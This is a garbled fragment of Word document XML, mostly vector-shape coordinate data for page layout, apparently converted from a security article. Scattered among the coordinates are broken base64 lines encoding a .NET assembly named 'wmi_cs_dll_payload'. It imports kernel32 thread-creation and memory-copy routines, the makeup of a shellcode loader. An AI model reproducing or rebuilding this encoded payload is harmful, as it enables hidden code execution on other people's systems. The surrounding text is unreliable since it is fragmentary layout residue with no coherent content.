716,2843,14716,2844,14716,2846,14716,2847,14716,2849,14716,2851,14716,2852,14716,2854,14716,2856,14716,2858,14716,2860,14716,2861,14716,2863,14716,2865,14716,2867,14716,2870,14716,2872,14716,2874,14716,2876,14716,2878,14716,2881,14716,2883,14716,2885,14716,2888,14716,2890,14716,2893,14716,2895,14716,2898,14716,2901,14716,2903,14716,2906,14716,2909,14716,2912,14716,2915,14716,2917,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14718,2920,14718,2920,14718,2920,14718,2920,14719,2920,14719,2920,14719,2920,14719,2920,14720,2920,14720,2920,14721,2920,14721,2920,14721,2920,14722,2920,14722,2920,14723,2920,14723,2920,14724,2920,14725,2920,14725,2920,14726,2920,14727,2920,14728,2920,14728,2920,14729,2920,14730,2920,14731,2920,14732,2920,14733,2920,14734,2920,14735,2920,14736,2920,14738,2920,14739,2920,14740,2920,14742,2920,14743,2920,14744,2920,14746,2920,14748,2920,14749,2920,14751,2920,14752,2920,14754,2920,14756,2920,14758,2920,14760,2920,14762,2920,14764,2920,14766,2920,14768,2920,14771,2920,14773,2920,14775,2920,14778,2920,14780,2920,14783,2920,14786,2920,14788,2920,14791,2920,14794,2920,14797,2920,14800,2920,14803,2920,14806,2920,14809,2920,14813,2920,14816,2920,14820,2920,14823,2920,14827,2920,14831,2920,14834,2920,14838,2920,14842,2920,14846,2920,14850,2920,14855,2920,14859,2920,14863,2920,14868,2920,14872,2920,14877,2920,14882,2920,14887,2920,14892,2920,14897,2920,14902,2920,14907,2920,14912,2920,14918,2920,14923,2920,14929,2920,14935,2920,14941,2920,14947,2920,14953,2920,14959,2920,14965,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2918,14972,2918,14972,2918,14972,2918,14972,2917,14972,2917,14972,2917,14972,2917,14972,2916,14972,2916,14972,2916,14972,2915,14972,2915,14972,2914,14972,2914,14972,2914,14972,2913,14972,2913,14972,2912,14972,2912,14972,2911,14972,2910,14972,2910,14972,2909,14972,2909,14972,2908,14972,2907,14972,2907,14972,2906,14972,2905,14972,2904,14972,2903,14972,2903,14972,2902,14972,2901,14972,2900,14972,2899,14972,2898,14972,2897,14972,2896,14972,2895,14972,2894,14972,2893,14972,2892,14972,2890,14972,2889,14972,2888,14972,2887,14972,2885,14972,2884,14972,2883,14972,2881,14972,2880,14972,2878,14972,2877,14972,2875,14972,2874,14972,2872,14972,2870,14972,2869,14972,2867,14972,2865,14972,2863,14972,2861,14972,2859,14972,2857,14972,2855,14972,2853,14972,2851,14972,2849,14972,2847,14972,2845,14972,2843,14972,2840,14972,2838,14972,2836,14972,2833,14972,2831,14972,2828,14972,2826,14972,2823,14972,2820,14972,2818,14972,2815,14972,2812,14972,2809,14972,2806,14972,2803,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14970,2800,14970,2800,14970,2800,14970,2800,14969,2800,14969,2800,14969,2800,14969,2800,14968,2800,14968,2800,14967,2800,14967,2800,14967,2800,14966,2800,14966,2800,14965,2800,14964,2800,14964,2800,14963,2800,14963,2800,14962,2800,14961,2800,14960,2800,14960,2800,14959,2800,14958,2800,14957,2800,14956,2800,14955,2800,14954,2800,14953,2800,14951,2800,14950,2800,14949,2800,14948,2800,14946,2800,14945,2800,14944,2800,14942,2800,14940,2800,14939,2800,14937,2800,14935,2800,14934,2800,14932,2800,14930,2800,14928,2800,14926,2800,14924,2800,14922,2800,14920,2800,14917,2800,14915,2800,14913,2800,14910,2800,14908,2800,14905,2800,14902,2800,14900,2800,14897,2800,14894,2800,14891,2800,14888,2800,14885,2800,14882,2800,14879,2800,14875,2800,14872,2800,14868,2800,14865,2800,14861,2800,14857,2800,14854,2800,14850,2800,14846,2800,14842,2800,14838,2800,14833,2800,14829,2800,14825,2800,14820,2800,14816,2800,14811,2800,14806,2800,14801,2800,14796,2800,14791,2800,14786,2800,14781,2800,14775,2800,14770,2800,14764,2800,14759,2800,14753,2800,14747,2800,14741,2800,14735,2800,14729,2800,14723,2800,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:15330;width:130;height:270" coordorigin="2790,15330" coordsize="130,270" path="m2800,15347l2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2802,15347,2802,15347,2802,15347,2802,15347,2802,15347,2802,15347,2803,15347,2803,15347,2803,15347,2803,15347,2803,15347,2804,15347,2804,15347,2804,15347,2805,15347,2805,15347,2805,15347,2806,15347,2806,15347,2806,15347,2807,15347,2807,15347,2808,15347,2808,15347,2809,15347,2809,15347,2810,15347,2810,15347,2811,15347,2812,15347,2812,15347,2813,15347,2814,15347,2814,15347,2815,15347,2816,15347,2817,15347,2817,15347,2818,15347,2819,15347,2820,15347,2821,15347,2822,15347,2823,15347,2824,15347,2825,15347,2826,15347,2827,15347,2828,15347,2829,15347,2830,15347,2832,15347,2833,15347,2834,15347,2836,15347,2837,15347,2838,15347,2840,15347,2841,15347,2843,15347,2844,15347,2846,15347,2847,15347,2849,15347,2851,15347,2852,15347,2854,15347,2856,15347,2858,15347,2860,15347,2861,15347,2863,15347,2865,15347,2867,15347,2870,15347,2872,15347,2874,15347,2876,15347,2878,15347,2881,15347,2883,15347,2885,15347,2888,15347,2890,15347,2893,15347,2895,15347,2898,15347,2901,15347,2903,15347,2906,15347,2909,15347,2912,15347,2915,15347,2917,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15348,2920,15348,2920,15348,2920,15348,2920,15348,2920,15349,2920,15349,2920,15349,2920,15349,2920,15350,2920,15350,2920,15350,2920,15351,2920,15351,2920,15352,2920,15352,2920,15353,2920,15353,2920,15354,2920,15354,2920,15355,2920,15356,2920,15356,2920,15357,2920,15358,2920,15359,2920,15360,2920,15361,2920,15361,2920,15362,2920,15363,2920,15365,2920,15366,2920,15367,2920,15368,2920,15369,2920,15371,2920,15372,2920,15373,2920,15375,2920,15376,2920,15378,2920,15379,2920,15381,2920,15383,2920,15385,2920,15386,2920,15388,2920,15390,2920,15392,2920,15394,2920,15396,2920,15399,2920,15401,2920,15403,2920,15406,2920,15408,2920,15411,2920,15413,2920,15416,2920,15419,2920,15421,2920,15424,2920,15427,2920,15430,2920,15433,2920,15436,2920,15440,2920,15443,2920,15446,2920,15450,2920,15453,2920,15457,2920,15461,2920,15465,2920,15469,2920,15472,2920,15477,2920,15481,2920,15485,2920,15489,2920,15494,2920,15498,2920,15503,2920,15507,2920,15512,2920,15517,2920,15522,2920,15527,2920,15532,2920,15537,2920,15543,2920,15548,2920,15554,2920,15559,2920,15565,2920,15571,2920,15577,2920,15583,2920,15589,2920,15595,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2918,15602,2918,15602,2918,15602,2918,15602,2917,15602,2917,15602,2917,15602,2917,15602,2916,15602,2916,15602,2916,15602,2915,15602,2915,15602,2914,15602,2914,15602,2914,15602,2913,15602,2913,15602,2912,15602,2912,15602,2911,15602,2910,15602,2910,15602,2909,15602,2909,15602,2908,15602,2907,15602,2907,15602,2906,15602,2905,15602,2904,15602,2903,15602,2903,15602,2902,15602,2901,15602,2900,15602,2899,15602,2898,15602,2897,15602,2896,15602,2895,15602,2894,15602,2893,15602,2892,15602,2890,15602,2889,15602,2888,15602,2887,15602,2885,15602,2884,15602,2883,15602,2881,15602,2880,15602,2878,15602,2877,15602,2875,15602,2874,15602,2872,15602,2870,15602,2869,15602,2867,15602,2865,15602,2863,15602,2861,15602,2859,15602,2857,15602,2855,15602,2853,15602,2851,15602,2849,15602,2847,15602,2845,15602,2843,15602,2840,15602,2838,15602,2836,15602,2833,15602,2831,15602,2828,15602,2826,15602,2823,15602,2820,15602,2818,15602,2815,15602,2812,15602,2809,15602,2806,15602,2803,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15600,2800,15600,2800,15600,2800,15600,2800,15599,2800,15599,2800,15599,2800,15599,2800,15598,2800,15598,2800,15597,2800,15597,2800,15596,2800,15596,2800,15595,2800,15595,2800,15594,2800,15594,2800,15593,2800,15592,2800,15591,2800,15591,2800,15590,2800,15589,2800,15588,2800,15587,2800,15586,2800,15585,2800,15584,2800,15583,2800,15582,2800,15581,2800,15579,2800,15578,2800,15577,2800,15575,2800,15574,2800,15572,2800,15571,2800,15569,2800,15567,2800,15566,2800,15564,2800,15562,2800,15560,2800,15558,2800,15556,2800,15554,2800,15552,2800,15550,2800,15548,2800,15545,2800,15543,2800,15541,2800,15538,2800,15535,2800,15533,2800,15530,2800,15527,2800,15524,2800,15521,2800,15518,2800,15515,2800,15512,2800,15509,2800,15506,2800,15502,2800,15499,2800,15495,2800,15491,2800,15488,2800,15484,2800,15480,2800,15476,2800,15472,2800,15468,2800,15464,2800,15459,2800,15455,2800,15450,2800,15446,2800,15441,2800,15436,2800,15432,2800,15427,2800,15422,2800,15416,2800,15411,2800,15406,2800,15400,2800,15395,2800,15389,2800,15383,2800,15378,2800,15372,2800,15366,2800,15359,2800,15353,2800,1534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80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"cFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZ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HdDcmVh"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81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"dGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU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2VjdXJp"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82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"dHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5Q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WN0aW9u"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83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"AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0a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W9uc0F0"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"dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB3bWlfY3NfZGxsX3Bhe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WxvYWQA"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"Qnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57MEQxQTVERjAtRDZCNy00R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UUzLUJB"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"QzItOTY0MUUyREJCMDNFfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5c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GUAX19T"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"dGF0aWNBcnJheUluaXRUeXBlU2l6ZT0zNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50a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W1lSGVs"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"cGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFB0c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gBvcF9F"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"eHBsaWNpdABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5A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Fplcm8A"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90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"RGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyAC5jY3RvcgBTeXN0ZW0uU2VjdXJpdHkAV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W52ZXJp"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91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"ZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsD4ACLd6X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FYZNOCJ"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92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"AyAAAQMAAAECBgkHAAQJCQkJCQoABhgJCQkYCRAJBQACCRgJBSABARENBCABAQgEAQAAA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AMGERAH"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93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"AAIBEikRLQQAARgKCAAEAR0FCBgIAgYYCAcFHQUJGAkYBCABAQ4IAQAIAAAAAAAeAQABA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FQCFldy"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"YXBOb25FeGNlcHRpb25UaHJvd3MBgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb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25zLlNl"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"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuM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CwgQ3Vs"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"dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa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2lwVmVy"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"aWZpY2F0aW9uAQAAAOgpAAAAAAAAAAAAAP4pAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAA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ADwKQAA"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"AAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAA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100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101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102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999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999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999l1517,999,1517,999,1517,999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7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7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1,1510,2693,1510,2685,1510,2677,1510,2668,1510,2659,1510,2650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3,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3614,10484,3618,10484,3622,10484,3625,10484,3629,10484,3633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3,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3614,1517,3618,1517,3622,1517,3625,1517,3629,1517,3633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5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4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2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5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0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2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2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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:630" coordorigin="1490,6730" coordsize="8990,6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8,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6756,10484,6757,10484,6757,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6765,10484,6766,10484,6768,10484,6770,10484,6771,10484,6773,10484,6775,10484,6777,10484,6779,10484,6781,10484,6784,10484,6786,10484,6789,10484,6791,10484,6794,10484,6797,10484,6800,10484,6803,10484,6806,10484,6810,10484,6813,10484,6817,10484,6820,10484,6824,10484,6828,10484,6832,10484,6837,10484,6841,10484,6845,10484,6850,10484,6855,10484,6860,10484,6865,10484,6870,10484,6876,10484,6881,10484,6887,10484,6893,10484,6899,10484,6905,10484,6912,10484,6918,10484,6925,10484,6932,10484,6939,10484,6946,10484,6954,10484,6961,10484,6969,10484,6977,10484,6985,10484,6994,10484,7002,10484,7011,10484,7020,10484,7029,10484,7039,10484,7048,10484,7058,10484,7068,10484,7078,10484,7089,10484,7099,10484,7110,10484,7121,10484,7133,10484,7144,10484,7156,10484,7168,10484,7180,10484,7193,10484,7206,10484,7219,10484,7232,10484,7245,10484,7259,10484,7273,10484,7287,10484,7302,10484,7316,10484,7331,10484,7346,10484,7362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7,1510,7377,1510,7377,1510,7377,1510,7377,1510,7377,1510,7376,1510,7376,1510,7376,1510,7376,1510,7375,1510,7375,1510,7374,1510,7374,1510,7373,1510,7373,1510,7372,1510,7371,1510,7370,1510,7369,1510,7369,1510,7368,1510,7367,1510,7365,1510,7364,1510,7363,1510,7362,1510,7360,1510,7359,1510,7357,1510,7356,1510,7354,1510,7352,1510,7350,1510,7348,1510,7346,1510,7344,1510,7341,1510,7339,1510,7336,1510,7334,1510,7331,1510,7328,1510,7325,1510,7322,1510,7319,1510,7315,1510,7312,1510,7308,1510,7305,1510,7301,1510,7297,1510,7293,1510,7289,1510,7284,1510,7280,1510,7275,1510,7270,1510,7265,1510,7260,1510,7255,1510,7249,1510,7244,1510,7238,1510,7232,1510,7226,1510,7220,1510,7214,1510,7207,1510,7200,1510,7193,1510,7186,1510,7179,1510,7171,1510,7164,1510,7156,1510,7148,1510,7140,1510,7131,1510,7123,1510,7114,1510,7105,1510,7096,1510,7086,1510,7077,1510,7067,1510,7057,1510,7047,1510,7036,1510,7026,1510,7015,1510,7004,1510,6992,1510,6981,1510,6969,1510,6957,1510,6945,1510,6932,1510,6919,1510,6907,1510,6893,1510,6880,1510,6866,1510,6852,1510,6838,1510,6824,1510,6809,1510,6794,1510,6779,1510,6763,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:336.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:6730;width:30;height:650" coordorigin="1490,6730" coordsize="30,650" path="m1517,6747l1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6749,1517,6749,1517,6749,1517,6750,1517,6750,1517,6750,1517,6751,1517,6751,1517,6752,1517,6753,1517,6753,1517,6754,1517,6755,1517,6756,1517,6757,1517,6757,1517,6759,1517,6760,1517,6761,1517,6762,1517,6763,1517,6765,1517,6766,1517,6768,1517,6770,1517,6771,1517,6773,1517,6775,1517,6777,1517,6779,1517,6781,1517,6784,1517,6786,1517,6789,1517,6791,1517,6794,1517,6797,1517,6800,1517,6803,1517,6806,1517,6810,1517,6813,1517,6817,1517,6820,1517,6824,1517,6828,1517,6832,1517,6837,1517,6841,1517,6845,1517,6850,1517,6855,1517,6860,1517,6865,1517,6870,1517,6876,1517,6881,1517,6887,1517,6893,1517,6899,1517,6905,1517,6912,1517,6918,1517,6925,1517,6932,1517,6939,1517,6946,1517,6954,1517,6961,1517,6969,1517,6977,1517,6985,1517,6994,1517,7002,1517,7011,1517,7020,1517,7029,1517,7039,1517,7048,1517,7058,1517,7068,1517,7078,1517,7089,1517,7099,1517,7110,1517,7121,1517,7133,1517,7144,1517,7156,1517,7168,1517,7180,1517,7193,1517,7206,1517,7219,1517,7232,1517,7245,1517,7259,1517,7273,1517,7287,1517,7302,1517,7316,1517,7331,1517,7346,1517,7362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33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7350" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7350;width:8990;height:670" coordorigin="1490,7350" coordsize="8990,67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9,10484,7379,10484,7379,10484,7379,10484,7380,10484,7380,10484,7380,10484,7381,10484,7381,10484,7382,10484,7382,10484,7383,10484,7384,10484,7384,10484,7385,10484,7386,10484,7387,10484,7388,10484,7389,10484,7390,10484,7391,10484,7393,10484,7394,10484,7396,10484,7397,10484,7399,10484,7400,10484,7402,10484,7404,10484,7406,10484,7408,10484,7410,10484,7413,10484,7415,10484,7417,10484,7420,10484,7423,10484,7426,10484,7429,10484,7432,10484,7435,10484,7438,10484,7441,10484,7445,10484,7449,10484,7452,10484,7456,10484,7460,10484,7465,10484,7469,10484,7473,10484,7478,10484,7483,10484,7488,10484,7493,10484,7498,10484,7504,10484,7509,10484,7515,10484,7521,10484,7527,10484,7533,10484,7539,10484,7546,10484,7553,10484,7559,10484,7567,10484,7574,10484,7581,10484,7589,10484,7597,10484,7605,10484,7613,10484,7621,10484,7630,10484,7639,10484,7648,10484,7657,10484,7666,10484,7676,10484,7686,10484,7696,10484,7706,10484,7717,10484,7727,10484,7738,10484,7749,10484,7761,10484,7772,10484,7784,10484,7796,10484,7808,10484,7821,10484,7834,10484,7847,10484,7860,10484,7874,10484,7887,10484,7901,10484,7916,10484,7930,10484,7945,10484,7960,10484,7975,10484,7991,10484,8007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2,1510,8022,1510,8022,1510,8022,1510,8021,1510,8021,1510,8021,1510,8020,1510,8020,1510,8019,1510,8019,1510,8018,1510,8018,1510,8017,1510,8016,1510,8015,1510,8015,1510,8014,1510,8013,1510,8012,1510,8010,1510,8009,1510,8008,1510,8007,1510,8005,1510,8004,1510,8002,1510,8000,1510,7999,1510,7997,1510,7995,1510,7993,1510,7990,1510,7988,1510,7986,1510,7983,1510,7981,1510,7978,1510,7975,1510,7972,1510,7969,1510,7966,1510,7963,1510,7959,1510,7956,1510,7952,1510,7948,1510,7944,1510,7940,1510,7936,1510,7932,1510,7927,1510,7923,1510,7918,1510,7913,1510,7908,1510,7903,1510,7897,1510,7892,1510,7886,1510,7880,1510,7874,1510,7868,1510,7861,1510,7855,1510,7848,1510,7841,1510,7834,1510,7827,1510,7820,1510,7812,1510,7804,1510,7796,1510,7788,1510,7779,1510,7771,1510,7762,1510,7753,1510,7744,1510,7734,1510,7725,1510,7715,1510,7705,1510,7695,1510,7684,1510,7674,1510,7663,1510,7651,1510,7640,1510,7628,1510,7617,1510,7605,1510,7592,1510,7580,1510,7567,1510,7554,1510,7541,1510,7527,1510,7513,1510,7499,1510,7485,1510,7470,1510,7456,1510,7441,1510,7425,1510,7410,1510,7394,1510,7378e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:368.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7370" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:7370;width:30;height:650" coordorigin="1490,7370" coordsize="30,650" path="m1517,7378l1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7379,1517,7379,1517,7379,1517,7379,1517,7380,1517,7380,1517,7380,1517,7381,1517,7381,1517,7382,1517,7382,1517,7383,1517,7384,1517,7384,1517,7385,1517,7386,1517,7387,1517,7388,1517,7389,1517,7390,1517,7391,1517,7393,1517,7394,1517,7396,1517,7397,1517,7399,1517,7400,1517,7402,1517,7404,1517,7406,1517,7408,1517,7410,1517,7413,1517,7415,1517,7417,1517,7420,1517,7423,1517,7426,1517,7429,1517,7432,1517,7435,1517,7438,1517,7441,1517,7445,1517,7449,1517,7452,1517,7456,1517,7460,1517,7465,1517,7469,1517,7473,1517,7478,1517,7483,1517,7488,1517,7493,1517,7498,1517,7504,1517,7509,1517,7515,1517,7521,1517,7527,1517,7533,1517,7539,1517,7546,1517,7553,1517,7559,1517,7567,1517,7574,1517,7581,1517,7589,1517,7597,1517,7605,1517,7613,1517,7621,1517,7630,1517,7639,1517,7648,1517,7657,1517,7666,1517,7676,1517,7686,1517,7696,1517,7706,1517,7717,1517,7727,1517,7738,1517,7749,1517,7761,1517,7772,1517,7784,1517,7796,1517,7808,1517,7821,1517,7834,1517,7847,1517,7860,1517,7874,1517,7887,1517,7901,1517,7916,1517,7930,1517,7945,1517,7960,1517,7975,1517,7991,1517,8007,1517,8023e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:8010;width:8990;height:630" coordorigin="1490,8010" coordsize="8990,630" path="m1510,8023l1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1511,8023,1512,8023,1512,8023,1514,8023,1515,8023,1517,8023,1519,8023,1521,8023,1524,8023,1528,8023,1532,8023,1536,8023,1541,8023,1546,8023,1552,8023,1559,8023,1566,8023,1575,8023,1583,8023,1593,8023,1603,8023,1615,8023,1627,8023,1640,8023,1654,8023,1668,8023,1684,8023,1701,8023,1719,8023,1738,8023,1758,8023,1780,8023,1802,8023,1826,8023,1851,8023,1877,8023,1904,8023,1933,8023,1963,8023,1995,8023,2028,8023,2063,8023,2099,8023,2136,8023,2175,8023,2216,8023,2259,8023,2303,8023,2348,8023,2396,8023,2445,8023,2496,8023,2549,8023,2604,8023,2660,8023,2719,8023,2779,8023,2841,8023,2906,8023,2972,8023,3041,8023,3112,8023,3184,8023,3259,8023,3336,8023,3416,8023,3498,8023,3582,8023,3668,8023,3757,8023,3848,8023,3941,8023,4037,8023,4136,8023,4236,8023,4340,8023,4446,8023,4555,8023,4666,8023,4780,8023,4897,8023,5017,8023,5139,8023,5264,8023,5392,8023,5523,8023,5657,8023,5793,8023,5933,8023,6076,8023,6222,8023,6370,8023,6522,8023,6677,8023,6835,8023,6997,8023,7161,8023,7329,8023,7500,8023,7675,8023,7853,8023,8034,8023,8219,8023,8407,8023,8598,8023,8793,8023,8992,8023,9194,8023,9400,8023,9609,8023,9823,8023,10039,8023,10260,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8024,10484,8024,10484,8024,10484,8024,10484,8024,10484,8025,10484,8025,10484,8025,10484,8026,10484,8026,10484,8026,10484,8027,10484,8028,10484,8028,10484,8029,10484,8030,10484,8030,10484,8031,10484,8032,10484,8033,10484,8034,10484,8035,10484,8036,10484,8038,10484,8039,10484,8040,10484,8042,10484,8044,10484,8045,10484,8047,10484,8049,10484,8051,10484,8053,10484,8055,10484,8057,10484,8059,10484,8062,10484,8064,10484,8067,10484,8070,10484,8073,10484,8076,10484,8079,10484,8082,10484,8085,10484,8089,10484,8092,10484,8096,10484,8100,10484,8104,10484,8108,10484,8112,10484,8117,10484,8121,10484,8126,10484,8131,10484,8136,10484,8141,10484,8146,10484,8151,10484,8157,10484,8163,10484,8169,10484,8175,10484,8181,10484,8187,10484,8194,10484,8201,10484,8207,10484,8215,10484,8222,10484,8229,10484,8237,10484,8245,10484,8253,10484,8261,10484,8269,10484,8278,10484,8287,10484,8296,10484,8305,10484,8314,10484,8324,10484,8334,10484,8344,10484,8354,10484,8364,10484,8375,10484,8386,10484,8397,10484,8408,10484,8420,10484,8432,10484,8444,10484,8456,10484,8469,10484,8481,10484,8494,10484,8507,10484,8521,10484,8535,10484,8549,10484,8563,10484,8577,10484,8592,10484,8607,10484,8622,10484,8638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2,1510,8652,1510,8652,1510,8652,1510,8651,1510,8651,1510,8650,1510,8650,1510,8649,1510,8649,1510,8648,1510,8648,1510,8647,1510,8646,1510,8645,1510,8644,1510,8643,1510,8642,1510,8641,1510,8640,1510,8639,1510,8637,1510,8636,1510,8634,1510,8633,1510,8631,1510,8629,1510,8628,1510,8626,1510,8624,1510,8621,1510,8619,1510,8617,1510,8615,1510,8612,1510,8609,1510,8607,1510,8604,1510,8601,1510,8598,1510,8594,1510,8591,1510,8588,1510,8584,1510,8580,1510,8577,1510,8573,1510,8568,1510,8564,1510,8560,1510,8555,1510,8551,1510,8546,1510,8541,1510,8536,1510,8530,1510,8525,1510,8519,1510,8514,1510,8508,1510,8502,1510,8496,1510,8489,1510,8483,1510,8476,1510,8469,1510,8462,1510,8455,1510,8447,1510,8439,1510,8432,1510,8424,1510,8415,1510,8407,1510,8398,1510,8390,1510,8381,1510,8371,1510,8362,1510,8352,1510,8343,1510,8333,1510,8322,1510,8312,1510,8301,1510,8290,1510,8279,1510,8268,1510,8256,1510,8245,1510,8233,1510,8220,1510,8208,1510,8195,1510,8182,1510,8169,1510,8156,1510,8142,1510,8128,1510,8114,1510,8099,1510,8084,1510,8070,1510,8054,1510,8039,1510,8023e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="30,650">
